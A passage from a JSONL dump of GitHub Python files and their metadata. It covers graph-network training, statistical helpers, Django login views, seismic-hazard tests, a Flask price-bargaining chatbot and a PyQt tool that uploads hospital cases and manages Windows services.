y)\n #print(\"Train loss :\",float(loss))\n loss.backward()\n optimizer.step()\n if epoch==0:\n start_time= time.time()\n print(epoch, \"PyG time:\",time.time()-start_time)\n\nif __name__ == \"__main__\":\n loss1 = train_pyg(200)","repo_name":"Hsword/Het","sub_path":"geometric/tests/test_pyg_full_batch.py","file_name":"test_pyg_full_batch.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"36909384632","text":"__author__ = 'Haohan Wang'\n\nimport scipy.linalg as linalg\nimport scipy\nimport numpy as np\nfrom scipy import stats\n\ndef KFold(X,y,k=5):\n foldsize = int(X.shape[0]/k)\n for idx in range(k):\n testlst = range(idx*foldsize,idx*foldsize+foldsize)\n Xtrain = np.delete(X,testlst,0)\n ytrain = np.delete(y,testlst,0)\n Xtest = X[testlst]\n ytest = y[testlst]\n yield Xtrain, ytrain, Xtest, ytest\ndef matrixMult(A, B):\n try:\n linalg.blas\n except AttributeError:\n return np.dot(A, B)\n\n if not A.flags['F_CONTIGUOUS']:\n AA = A.T\n transA = True\n else:\n AA = A\n transA = False\n\n if not B.flags['F_CONTIGUOUS']:\n BB = B.T\n transB = True\n else:\n BB = B\n transB = False\n\n return linalg.blas.dgemm(alpha=1., a=AA, b=BB, trans_a=transA, trans_b=transB)\n\ndef factor(X, rho):\n \"\"\"\n computes cholesky factorization of the kernel K = 1/rho*XX^T + I\n\n Input:\n X design matrix: n_s x n_f (we assume n_s << n_f)\n rho: regularizaer\n\n Output:\n L lower triangular matrix\n U upper triangular matrix\n \"\"\"\n n_s, n_f = X.shape\n K = 1 / rho * scipy.dot(X, X.T) + scipy.eye(n_s)\n U = linalg.cholesky(K)\n return U\n\ndef tstat(beta, var, sigma, q, N, log=False):\n\n \"\"\"\n Calculates a t-statistic and associated p-value given the estimate of beta and its standard error.\n This is actually an F-test, but when only one hypothesis is being performed, it reduces to a t-test.\n \"\"\"\n ts = beta / np.sqrt(var * sigma)\n # ts = beta / np.sqrt(sigma)\n # ps = 2.0*(1.0 - stats.t.cdf(np.abs(ts), self.N-q))\n # sf == survival function - this is more accurate -- could also use logsf if the precision is not good enough\n if log:\n ps = 2.0 + (stats.t.logsf(np.abs(ts), N - q))\n else:\n ps = 2.0 * (stats.t.sf(np.abs(ts), N - q))\n if not len(ts) == 1 or not len(ps) == 1:\n raise Exception(\"Something bad happened :(\")\n # return ts, ps\n return ts.sum(), ps.sum()","repo_name":"HaohanWang/sLMMn","sub_path":"sLMMn/helpingMethods.py","file_name":"helpingMethods.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"28447771667","text":"from CSPPuzzle import CSPPuzzle\n\ndef main():\n x=inputInteger(\"Choose a puzzle 1 or 2 or 3 (0 to quit):\")\n while(x==None):\n x=inputInteger(\"Choose a puzzle 1 or 2 or 3:\")\n if(x!=0):\n try:\n puzzle=CSPPuzzle(str(x))\n puzzle.solve()\n except SystemExit:\n print(\"------------Puzzle is solved--------\")\n except:\n print(\"ERROR! \\n please try again.\")\n main()\ndef inputInteger(text):\n user_input = input(text)\n print(\"\\n\")\n try:\n val = int(user_input)\n return val\n except ValueError:\n print(\"input is not an integer.\")\n return None\n\nif __name__ == '__main__':\n main()","repo_name":"halilbalci/aiHW","sub_path":"puzzleSolvingApp.py","file_name":"puzzleSolvingApp.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9694385468","text":"from django.shortcuts import redirect\nfrom django.template.response import TemplateResponse\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login\nfrom django.utils.translation import ugettext as _\nfrom django.dispatch import Signal\nimport django.contrib.auth.views as auth\nfrom django.db import transaction\nfrom qrtrack.core.forms import RegistrationForm\nfrom qrtrack.core.utils.widget_list import WidgetList\nfrom qrtrack.analytics.utils import track_event\nfrom qrtrack.core.utils import Alerts\n\nprofile_widgets = WidgetList()\n# Provides newly registered user object\nregistration_successful = Signal(providing_args=['sender', 'request', 'user'])\n\n\ndef index(request):\n track_event(request, 'index_page_visited')\n return redirect(reverse('profile'), permanent=False)\n\n\ndef profile(request):\n track_event(request, 'profile_page_visited')\n alerts = Alerts()\n if not request.user.is_authenticated():\n alerts.warning(_(\"Your collected qrcodes might be lost in close future if you\"\n \" don't register to have them saved on the website\"))\n return TemplateResponse(request, 'registration/profile.html', {\n 'widgets': profile_widgets(request),\n 'alerts': alerts.build(),\n })\n\n\ndef login(request, *args, **kwargs):\n track_event(request, 'login_page_visited')\n response = auth.login(request, *args, **kwargs)\n if request.method == 'POST':\n if request.user.is_authenticated():\n track_event(request, 'login_success')\n else:\n track_event(request, 'login_failed')\n return response\n\n\ndef logout(request, *args, **kwargs):\n track_event(request, 'logout_page_visited')\n response = auth.logout(request, *args, **kwargs)\n return response\n\n@transaction.atomic\ndef register(request):\n if request.user.is_authenticated():\n return redirect(reverse('index'))\n\n if request.method == 'POST':\n form = RegistrationForm(request.POST)\n track_event(request, 'register_attempt')\n if form.is_valid():\n username = form.cleaned_data['username']\n email = form.cleaned_data['email']\n password = form.cleaned_data['password']\n user = User.objects.create_user(username,\n email,\n password)\n user.save()\n\n user = authenticate(username=username, password=password)\n login(request, user)\n\n track_event(request, 'register_success', username=username, email=email)\n registration_successful.send(sender=register, request=request, user=user)\n\n if 'next' in request.GET:\n next = request.GET['next']\n else:\n next = reverse('index')\n return redirect(next)\n\n else:\n track_event(request, 'register_page_visited')\n form = RegistrationForm()\n return TemplateResponse(request, 'registration/register.html',\n {'form': form}\n )\n","repo_name":"ritave/qrtrack","sub_path":"qrtrack/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3091,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"79"} +{"seq_id":"8689137851","text":"import os\nimport tempfile\nimport unittest\nimport numpy\nfrom openquake.baselib import hdf5, python3compat\nfrom openquake.hazardlib.source.multi_fault import MultiFaultSource\nfrom openquake.hazardlib.geo.surface import KiteSurface\nfrom openquake.hazardlib.tests.geo.surface import kite_fault_test as kst\nfrom openquake.hazardlib.sourcewriter import write_source_model\nfrom openquake.hazardlib.sourceconverter import SourceGroup\nfrom openquake.hazardlib.nrml import SourceModel\n\nBASE_DATA_PATH = os.path.join(os.path.dirname(__file__), 'data')\n\n\nclass MultiFaultTestCase(unittest.TestCase):\n \"\"\"\n Test the construction of multi-fault ruptures\n \"\"\"\n def setUp(self):\n\n hsmpl = 4\n vsmpl = 2\n idl = False\n alg = False\n\n # Create the surface of each section\n path = os.path.join(BASE_DATA_PATH, 'profiles00')\n prf, _ = kst._read_profiles(path)\n sfc_a = KiteSurface.from_profiles(prf, vsmpl, hsmpl, idl, alg)\n\n path = os.path.join(BASE_DATA_PATH, 'profiles01')\n prf, _ = kst._read_profiles(path)\n sfc_b = KiteSurface.from_profiles(prf, vsmpl, hsmpl, idl, alg)\n\n path = os.path.join(BASE_DATA_PATH, 'profiles02')\n prf, _ = kst._read_profiles(path)\n sfc_c = KiteSurface.from_profiles(prf, vsmpl, hsmpl, idl, alg)\n\n # Sections list\n sections = [sfc_a, sfc_b, sfc_c]\n\n # Rupture indexes\n rup_idxs = [[0], [1], [2], [0, 1], [0, 2],\n [1, 2], [0, 1, 2]]\n\n # Magnitudes\n rup_mags = [5.8, 5.8, 5.8, 6.2, 6.2, 6.2, 6.5]\n rakes = [90.0, 90.0, 90.0, 90.0, 90.0, 90.0, 90.0]\n\n # Occurrence probabilities of occurrence\n pmfs = [[0.90, 0.10],\n [0.90, 0.10],\n [0.90, 0.10],\n [0.90, 0.10],\n [0.90, 0.10],\n [0.90, 0.10],\n [0.90, 0.10]]\n self.sections = sections\n self.rup_idxs = rup_idxs\n self.pmfs = pmfs\n self.mags = numpy.array(rup_mags)\n self.rakes = rakes\n\n def test01(self):\n # test instantiation\n src = MultiFaultSource(\"01\", \"test\", \"Moon Crust\",\n self.rup_idxs, self.pmfs, self.mags, self.rakes)\n src.set_sections(self.sections)\n src.mutex_weight = 1.\n\n # test conversion to XML\n smodel = SourceModel([SourceGroup(\"Moon Crust\", [src], \"test_group\",\n src_interdep='mutex')])\n fd, tmp = tempfile.mkstemp(suffix='.xml')\n with os.fdopen(fd, 'wb'):\n sm_xml, gm_hdf5, gm_xml = write_source_model(tmp, smodel)\n # check the stored section indices\n with hdf5.File(gm_hdf5, 'r') as f:\n lines = python3compat.decode(f['01/rupture_idxs'][:])\n self.assertEqual(lines, ['0', '1', '2', '0 1', '0 2', '1 2', '0 1 2'])\n\n # test rupture generation\n rups = list(src.iter_ruptures())\n self.assertEqual(7, len(rups))\n\n def test02(self):\n # test set_sections, 3 is not a known section ID\n rup_idxs = [[0], [1], [3], [0], [1], [3], [0]]\n mfs = MultiFaultSource(\"01\", \"test\", \"Moon Crust\", rup_idxs,\n self.pmfs, self.mags, self.rakes)\n with self.assertRaises(IndexError) as ctx:\n mfs.set_sections(self.sections)\n expected = 'list index out of range'\n self.assertEqual(expected, str(ctx.exception))\n","repo_name":"gem/oq-engine","sub_path":"openquake/hazardlib/tests/source/multi_fault_test.py","file_name":"multi_fault_test.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","stars":338,"dataset":"github-code","pt":"79"} +{"seq_id":"33698581732","text":"import sys\nimport os.path\nimport argparse\n\nimport logging\n\n\ndef main():\n parser = argparse.ArgumentParser(description='report environments')\n parser.add_argument('-v', '--verbose',\n action='store_true',\n default=False)\n parser.add_argument('-d', '--debug',\n action='store_true',\n default=False)\n args = parser.parse_args()\n verbose = args.verbose\n logging.basicConfig()\n if args.debug:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.WARNING)\n\n # 環境変数の表示\n for k, v in os.environ.items():\n print(\"{key} : {value}\".format(key=k, value=v))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ProteinDF/ProteinDF_pytools","sub_path":"scripts/pdf-env.py","file_name":"pdf-env.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"42471957547","text":"from flask import Flask, render_template, flash, redirect, url_for, session, request, logging\nfrom flask_mysqldb import MySQL\nimport nltk\nfrom nltk.stem.lancaster import LancasterStemmer\nstemmer = LancasterStemmer()\nimport json\nimport numpy as np\nimport random\nimport tensorflow as tf\nimport keras\nimport pickle\nimport os\nfrom engine import get_recommendations\nimport pandas as pd\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout\nfrom keras.optimizers import SGD\n\napp = Flask(__name__)\n\n\n# Config MySQL\nmysql = MySQL()\napp.config['MYSQL_HOST'] = '127.0.0.1'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = ''\napp.config['MYSQL_DB'] = 'botto'\napp.config['MYSQL_CURSORCLASS'] = 'DictCursor'\n\n# Initialize the app for use with this MySQL class\nmysql.init_app(app)\n\n\n# Chat\nwith open('intents.json') as json_data:\n intents = json.load(json_data)\n\ndata = pickle.load( open( \"data.pickle\", \"rb\" ) )\nwords = data['words']\nclasses = data['classes']\n\ndef clean_up_sentence(sentence):\n # tokenize the pattern\n sentence_words = nltk.word_tokenize(sentence)\n # stem each word\n sentence_words = [stemmer.stem(word.lower()) for word in sentence_words]\n return sentence_words\n\n# return bag of words array: 0 or 1 for each word in the bag that exists in the sentence\ndef bow(sentence, words):\n # tokenize the pattern\n sentence_words = clean_up_sentence(sentence)\n # bag of words\n bag = [0]*len(words) \n for s in sentence_words:\n for i,w in enumerate(words):\n if w == s: \n bag[i] = 1\n \n return(np.array(bag))\n \n\nmodel = keras.models.load_model(\"model.pkl\")\n\n# Bargain \n\nclass Stack:\n def __init__(self):\n self.items = []\n\n def isEmpty(self):\n return self.items == []\n\n def push(self, item):\n self.items.append(item)\n\n def pop(self):\n return self.items.pop()\n\n def top(self):\n return self.items[len(self.items)-1]\n def prev(self):\n return self.items[len(self.items)-2] \n def next(self):\n return self.items[len(self.items)-3] \n\n def size(self):\n return len(self.items)\nuserStack =Stack()\nbotStack= Stack()\n\n\n\n@app.route('/')\ndef fn():\n return render_template('landingpage.html')\n\n@app.route('/allproducts')\ndef index():\n \n # Create cursor\n cur = mysql.connection.cursor()\n # Get message\n cur.execute(\"SELECT * FROM products ORDER BY id DESC \")\n allproduct = cur.fetchall()\n \n # Close Connection\n cur.close()\n return render_template('allproducts.html', allproducts=allproduct)\n\n@app.route('/', methods=['GET', 'POST'])\ndef cars(name):\n global flag\n flag=0\n for j in range(0,userStack.size()):\n userStack.pop()\n for k in range(0,botStack.size()):\n botStack.pop()\n\n # Create cursor\n cur = mysql.connection.cursor()\n # Get message\n values = name\n cur.execute(\"SELECT * FROM products WHERE brand=%s ORDER BY id ASC\", (values,))\n products = cur.fetchall()\n # Close Connection\n cur.close()\n\n if 'view' in request.args:\n product_id = request.args['view']\n curso = mysql.connection.cursor()\n curso.execute(\"SELECT * FROM products WHERE id=%s\", (product_id,))\n q = curso.fetchall()\n for row in q:\n global p_name\n p_name=row['pName']\n global price\n price=row['price']\n global mini\n mini=row['mini']\n userStack.push(price) \n global quantity\n quantity=0\n return render_template('view_product.html', details=q)\n \n else:\n return render_template('products.html', toys=products, values=name)\n\n\n@app.route(\"/get\")\ndef chat():\n userText = request.args.get('msg')\n res=0\n global mini\n global quantity\n global flag\n global discount\n global price\n global p_name\n global accepedPrice\n \n while True:\n for i in userText.split():\n if i.isdigit():\n res = i\n\n for i in userText.split():\n if i==\"accept\":\n return \"congrats on your deal. I will email you the link to purchase. \"\n elif i==\"reject\":\n randomresponse1 = [\"I understand. What do you offer, then?\",\"What could make it work, then?\",\"Fair enough, what's your counter offer\",\"Ok, what’s your counter offer?\",\"Hit me with your best shot!\",\"Make me an offer I can’t refuse!\" ]\n return random.choice(randomresponse1)\n\n if res == 0:\n input_data = pd.DataFrame([bow(userText, words)], dtype=float, index=['input'])\n results = model.predict([input_data])[0]\n results_index = np.argmax(results)\n tag = classes[results_index]\n\n if results[results_index] > 0.5:\n \n for tg in intents[\"intents\"]:\n if tg['tag'] == tag:\n responses = tg['responses']\n \n responce= random.choice(responses)\n return responce\n else:\n return(\"i didn't understand. try something else. \")\n\n elif quantity==0:\n if int(res) < 10 and int(res)>0:\n quantity=int(res)\n if quantity <= 1:\n discount = 7\n elif quantity==2:\n discount = 9\n else:\n discount = 10\n nextOffer = price-(price * (discount/100))\n botStack.push(nextOffer) \n\n return \"How much are you willing to offer per unit ?\" \n else:\n return \"Please enter a quantity \"\n \n else:\n hisOffer = int(res)\n if(flag == 0):\n \n\n if(hisOffer1) & (hisOfferbotStack.top()):\n userStack.push(hisOffer)\n accepedPrice= hisOffer\n return \"Congrats! We have a deal. I will email you the link to purchase. \"\n\n else:\n userStack.push(hisOffer)\n discount = discount + 3\n botStack.push(price-(price * (discount/100)))\n if(hisOffer>botStack.top()):\n return \"Congrats! We have a deal. I will email you the link to purchase. \"\n flag=1\n counterOffer=\"Sorry, I can’t accept that deal. We’ve been bargaining for a while and I can see that you are a tough negotiator. So here's my final offer of \" + str(botStack.top()) +\"\"\n somehtml='
'\n return '{} {}'.format(counterOffer, somehtml)\n\n\n elif(flag==1):\n if(hisOffer>botStack.top()):\n return \"Congrats! We have a deal. I will email you the link to purchase. \"\n #email()\n result_final = get_recommendations(p_name)\n names = []\n pictures = []\n ids = []\n brands=[]\n prices = []\n for i in range(len(result_final)):\n if result_final.iloc[i][4] '+'
'+names[m] +'

Rs '+str(prices[m]) +'

'\n cards+=card \n someHtml='
'+cards +'
'\n resp=\"That was my last offer, however you could check out these similar products in your budget\"\n \n return '{} {}'.format(resp, someHtml) \n\n''' \ndef email():\n message = Mail(\n from_email='Botto@toycars.com',\n to_emails='julianathayil@gmail.com',\n subject='Heres my final offer',\n html_content='

Still thinking about it?

Here is my final offer


Subaru Impreza 22B STi

Offer price = Rs 513

')\n try:\n sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))\n response = sg.send(message)\n print(response.status_code)\n except Exception as e:\n print(str(e))\n'''\n \nif __name__ == \"__main__\":\n app.run()\n global flag\n global discount\n global p_name\n global quantity\n global price\n global accepedPrice\n global mini","repo_name":"JulianaThayil/Keras-ecommerce-Chatbot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6465223478","text":"import sys\n\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nimport numpy as np\n\ndf = pd.read_csv(f'results.csv', header=None, names=['CPUs', 'N', 'd', 'time [s]'])\n\n# Acceleration\nfor d in np.unique(df['d']):\n df_d = df[df['d'] == d]\n \n cpus = df_d['CPUs'].values\n times = df_d['time [s]'].values\n \n accel = times[0] / times\n \n plt.plot(cpus, accel, marker='.', label=f'd={d}')\n\nplt.title(f'Acceleration for different d')\nplt.xlabel('CPUs')\nplt.ylabel('Acceleration (S(P) = T(1) / T(P))')\nplt.legend()\nplt.grid()\nplt.tight_layout()\n\nplt.savefig(f'plots/acceleration.png')\nplt.close() \n\n# Efficiency\nfor d in np.unique(df['d']):\n df_d = df[df['d'] == d]\n \n cpus = df_d['CPUs'].values\n times = df_d['time [s]'].values\n \n accel = times[0] / times\n eff = accel / cpus\n \n plt.plot(cpus, eff, marker='.', label=f'd={d}')\n\nplt.title(f'Efficiency for different d')\nplt.xlabel('CPUs')\nplt.ylabel('Efficiency (E(P) = S(P) / P)')\nplt.legend()\nplt.grid()\nplt.tight_layout()\n\nplt.savefig(f'plots/efficiency.png')\nplt.close() \n\n# Serial fraction\nfor d in np.unique(df['d']):\n df_d = df[df['d'] == d]\n \n cpus = df_d['CPUs'].values\n times = df_d['time [s]'].values\n \n accel = times[0] / times\n # sf = (1 / accel - 1 / cpus) / (1 - 1 / cpus)\n sf = (1 / accel - 1 / cpus)\n sf /= (1 - 1 / cpus)\n \n plt.plot(cpus, sf, marker='.', label=f'd={d}')\n\nplt.title(f'Serial fraction for different d')\nplt.xlabel('CPUs')\nplt.ylabel('Serial fraction (f(P) = [1/S(p) - 1/p] / [1 - 1/p])')\nplt.legend()\nplt.grid()\nplt.ylim(0, 0.2)\nplt.tight_layout()\n\nplt.savefig(f'plots/serial_fraction.png')\nplt.close() \n","repo_name":"MatiXOfficial/parallel-algorithms","sub_path":"lab6/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16697117204","text":"#Part1 Siyan Huo bm21725@bristol.ac.uk\n\n'''\ndefine the Board class\n'''\n\n#CLASS1\nclass Board:\n #Defining basic properties\n def __init__(self,size,PlayerNumber):\n self.size=size\n self.PlayerNumber=PlayerNumber\n \n #Game instructions\n def md(self):\n print('Hello! Welcome!')\n print('The number 8 represents the wall,')\n print('the numbers 1 and 2 represent the two players, ')\n print('the number 0 represents the place that can be walked,')\n print('and the number 4 represents the place that cannot be walked because it has already been walked.')\n print('=======How to manage it?==========')\n print('The two players are moving in turns on a grid board that is surrounded by walls. ')\n print('A player can move in four directions (up, down, left, right). ')\n print('NOTE:Enter uppercase letters U,D,L, and R.')\n print('As a player moves, it leaves a trail on the spaces it has traversed, which acts as a wall.')\n print('The game ends if at least one player crashes into the wall, another player or previously visited cell. ')\n print('The player who survives the longest win. ')\n \n #the default board \n def bd(self):\n #Define an empty list\n a1=[]\n # Generates nested lists in empty lists\n for i in range(self.size):\n a1.append([])\n for j in range(self.size):\n a1[i].append(0) \n #Player 1 is represented by the number 1\n a1[1][1]=1\n #Player 2 is represented by the number 2\n a1[self.size-2][self.size-2]=2\n #Build a wall, representing the wall with the number 8\n for k in range(self.size):\n a1[k][0]=8\n a1[k][self.size-1]=8\n for f in range(self.size):\n a1[0][f]=8\n a1[self.size-1][f]=8\n #For aesthetics, traverse the list to print\n for g in range(self.size):\n print(a1[g])\n return a1\n \n #show there are how many players\n def pi(self):\n print('There are '+str(self.PlayerNumber)+' players totally.')\n","repo_name":"Siyanho/project","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71623533374","text":"inputString = [\"M\", \"r\", \" \", \"J\", \"o\", \"h\", \"n\", \" \", \"S\", \"m\", \"i\", \"t\", \"h\"]\ninputlength = len(inputString)\n\n\n# string : An array of char\n# length : The true length of the string\n# create another empty array to store!\n\nclass Solution:\n def replaceBlank(self, string, length):\n # output_string\n output_array = []\n shift = 0\n for i in range(length):\n if string[i] == \" \":\n output_array.append('%')\n output_array.append('2')\n output_array.append('0')\n shift += 2\n else:\n output_array.append(string[i])\n\n output_len = length + shift\n return output_array, output_len\n\n\n# print(inputString)\n\nsolution = Solution()\n\nprint(solution.replaceBlank(inputString, inputlength))\n\n#\n# extralen = 0\n# for i in range(inputlength):\n# if inputString[i] == \" \":\n# print(i)\n# for j in range(i, inputlength):\n#\n# inputString[i] = \"%\"\n# inputString[i + 1] = \"2\"\n# inputString[i + 2] = \"0\"\n# extralen += 2\n#\n# inputlength += extralen\n# print(inputString)\n# print(inputlength)\n","repo_name":"beckhong/PythonLearning-DataStructureLearning","sub_path":"CodePractice/lintCode/easy/212_spaceReplacement.py","file_name":"212_spaceReplacement.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14117488069","text":"# 가사 검색\n# https://programmers.co.kr/learn/courses/30/lessons/60060\n\nfrom bisect import bisect_left\nfrom bisect import bisect_right\nfrom copy import deepcopy\n\ndef solution(words, queries):\n answer = []\n words_reversed = [ word[::-1] for word in words ]\n\n words.sort()\n # words_reversed.sort(reverse=True)\n words_reversed.sort()\n\n words_by_len = [ [] for _ in range(10001) ]\n words_reversed_by_len = [ [] for _ in range(10001) ]\n\n for word in words:\n words_by_len[ len(word) ].append(word)\n for word in words_reversed:\n words_reversed_by_len[ len(word) ].append(word)\n\n for query in queries:\n\n if query[0] == '?': # '?'가 왼쪽에 위차한 경우 뒤집어진 word와 비교\n l = bisect_left(words_reversed_by_len[len(query)], query[::-1].replace('?', 'a'))\n r = bisect_right(words_reversed_by_len[len(query)], query[::-1].replace('?', 'z'))\n else: # '?'가 오른쪽에 위치한 경우 정방향 word와 비교\n l = bisect_left(words_by_len[len(query)], query.replace('?', 'a'))\n r = bisect_right(words_by_len[len(query)], query.replace('?', 'z'))\n\n answer.append(r-l)\n \n return answer\n\nwords = [\"frodo\", \"front\", \"frost\", \"frozen\", \"frame\", \"kakao\"]\nqueries = [\"fro??\", \"????o\", \"fr???\", \"fro???\", \"pro?\"]\nprint( solution(words, queries) )\n","repo_name":"DojinPark/algorithms","sub_path":"이것이코딩테스트다_나동빈/ch15prob30.py","file_name":"ch15prob30.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21911639334","text":"# -*- coding: utf-8 -*-\n\"\"\"\nModule implementing MainWindow.\n\"\"\"\nimport win32serviceutil\nimport win32service\nimport win32event\nimport winerror\nimport servicemanager\nimport logging\nimport os\nimport inspect\nimport time\nimport sys\nfrom PyQt5.QtCore import pyqtSlot,QDateTime,QTime\nfrom PyQt5.QtWidgets import QMainWindow\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QMessageBox,QFileDialog,QDesktopWidget\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QIcon\n# from Ui_upload import Ui_MainWindow\nimport oss2\nimport json\nimport requests\nimport codecs\nimport datetime\nimport win32timezone\nimport re\nfrom PyQt5.QtCore import QEvent\nfrom HospitalUploadProc import HospitalUploadProc,UpLoadResult,UpLoadResult_dit\nfrom Ui_upload import Ui_MainWindow\nfrom service_manager import ServiceManager\ndef_dirname ='HA003C02201812190011'\n# 重载函数,并定义信号,以便主程序处理\nKey_vaild = 3\n\nclass UploadThread(QtCore.QThread,HospitalUploadProc):\n #完成时返回的信号量\n # finishSignal = QtCore.pyqtSignal(list) # 信号\n trigger = QtCore.pyqtSignal(dict)\n def __init__(self,parent=None,op_type=None,input_array=dict):\n super(UploadThread, self).__init__(parent)\n self.working = True\n self.num = 0\n self._type= op_type\n self._arry=input_array\n self._FileCount=0\n self._UpLoadCaseCount = 0\n self._TotalCase=0\n self.local = os.path.dirname(os.path.realpath(__file__))\n\n def start_timer(self):\n self.num = 0\n self.start()\n\n def install_service(self,ServiceName,ServicePath):\n count = 0\n app = ServiceManager(ServiceName)\n self.trigger.emit({'info': '正在%s启动服务,请稍后!............'%ServiceName})\n if False == app.is_exists():\n while True:\n if count > 3:\n self.trigger.emit({'info': '%s服务安装失败' % ServiceName}) # 发送信号\n return False\n cmd = '{0} --startup auto install'.format(os.path.join(self.local, ServicePath))\n os.system(cmd)\n if True == app.is_exists():\n self.trigger.emit({'info': '%s服务安装成功'%ServiceName}) # 发送信号\n break\n time.sleep(5)\n count =count + 1\n self.trigger.emit({'info': '%s服务安装成功'%ServiceName}) # 发送信('PythonService 服务安装成功!')\n if 'RUNNING' not in str(app.status()):\n count = 0\n while True:\n if count > 5:\n self.trigger.emit({'info': '%s服务启动失败!' % ServiceName}) # 发送信号\n return False\n app.restart()\n if 'RUNNING' in str(app.status()):\n self.trigger.emit({'info': '%s服务启动成功!'%ServiceName})\n return True\n time.sleep(5)\n count = count + 1\n self.trigger.emit({'info': '%s服务启动失败,第%d次重试!' % (ServiceName,count)}) # 发送信号\n else:\n self.trigger.emit({'info': '%s服务已启动!'%ServiceName})\n return True\n\n def StopService(self,ServiceName):\n app = ServiceManager(ServiceName)\n self.trigger.emit({'info': '正在停止%s服务,请稍后!............'%ServiceName})\n if False == app.is_exists():\n self.trigger.emit({'info': '%s服务已停止!'%ServiceName})\n # self.trigger.emit({'status': False}) # 发送信号\n return False\n if 'STOPPING' not in str(app.status()):\n while True:\n app.stop()\n if 'STOPPED' in str(app.status()):\n self.trigger.emit({'info': '%s服务已停止!' % ServiceName})\n return True\n else:\n time.sleep(2)\n else:\n self.trigger.emit({'info': '%s服务已停止!'%ServiceName})\n return True\n\n def RemoveService(self,ServiceName,ServicePath):\n app = ServiceManager(ServiceName)\n count = 0\n if False == app.is_exists():\n self.trigger.emit({'info': '%s服务已删除!' % ServiceName})\n return True\n while True:\n if count > 5:\n self.trigger.emit({'info': '%s服务已标记为删除,请稍后再查看!' % ServiceName})\n return False\n if False == app.is_exists():\n self.trigger.emit({'info': '%s服务已删除!' % ServiceName})\n return True\n cmd = '{0} remove'.format(os.path.join(self.local, ServicePath))\n os.system(cmd)\n time.sleep(5)\n count =count + 1\n self.trigger.emit({'info': '正在删除%s服务,请稍后..........!' %ServiceName})\n\n\n def run(self):\n while self.working:\n # print(\"Working\", self.thread())\n #返回结果\n if self._type =='manuUpLoad':\n self._FileCount = self.Get_File_Nub(self._arry.get('Case_Path'))\n result = self.UpLoad_Case(self._arry.get('Pa_info'),self._arry.get('baseurl') ,self._arry.get('Case_Path') ,self._arry.get('Force_flag'))\n # self.update_text_singal.emit(\"Running time:\", '1') # 发送信号\n self.trigger.emit({'status':result})# 发送信号\n\n elif self._type =='allUpLoad':\n count = 0\n temp_count = 0\n self._FileCount = 0\n self._UpLoadCaseCount = 0\n self._TotalCase =0\n self.trigger.emit({'info': '正在统计:%s内需要上传的文件个数,请稍后!' % self._arry.get('Case_Path')}) # 发送信号\n for Key in UpLoadResult_dit.keys():\n UpLoadResult_dit[Key] = []\n for hp_temp in os.listdir(self._arry.get('Case_Path')):\n temp_path = os.path.join(self._arry.get('Case_Path'), hp_temp)\n if os.path.isdir(temp_path):\n self._FileCount = self._FileCount + self.Get_File_Nub(temp_path)\n self._TotalCase = self._TotalCase +1\n self.trigger.emit({'info': '%s内共计%d个文件需要上传!' % (self._arry.get('Case_Path'), self._FileCount )}) # 发送信号\n for hp_temp in os.listdir(self._arry.get('Case_Path')):\n temp_path = os.path.join(self._arry.get('Case_Path'), hp_temp)\n if os.path.isdir(temp_path):\n self.trigger.emit({'info': '正在上传CASE文件:%s,请稍后!'%temp_path}) # 发送信号\n UpLoadResult_dit[UpLoadResult.Total_Case].append(hp_temp)\n result =self.UpLoad_Case(self._arry.get('Pa_info'),self._arry.get('baseurl') ,temp_path ,self._arry.get('Force_flag'))\n if result in UpLoadResult_dit.keys():\n UpLoadResult_dit[result].append(hp_temp)\n if UpLoadResult.Proc_Ok == result:\n temp_count = temp_count+1\n count=count+1\n self.trigger.emit({'case_count': count,'total_case':self._TotalCase}) # 发送信号\n # print(UpLoadResult_dit)\n self.trigger.emit({'info':self.PraceResult(UpLoadResult_dit)}) # 发送信号\n self.trigger.emit({'status': temp_count}) # 发送信号\n\n elif self._type =='StartService':\n self.install_service('PythonService','hospital_service.exe')\n result = self.install_service('Hospital_Monitor','hospital_monitor.exe')\n self.trigger.emit({'status':result})\n\n elif self._type=='StopService':\n self.StopService('Hospital_Monitor')\n result = self.StopService('PythonService')\n self.trigger.emit({'status': result})\n\n elif self._type == 'DeleteService':\n self.RemoveService('Hospital_Monitor','hospital_monitor.exe')\n result = self.RemoveService('PythonService','hospital_service.exe')\n self.trigger.emit({'status': result})\n\n return\n 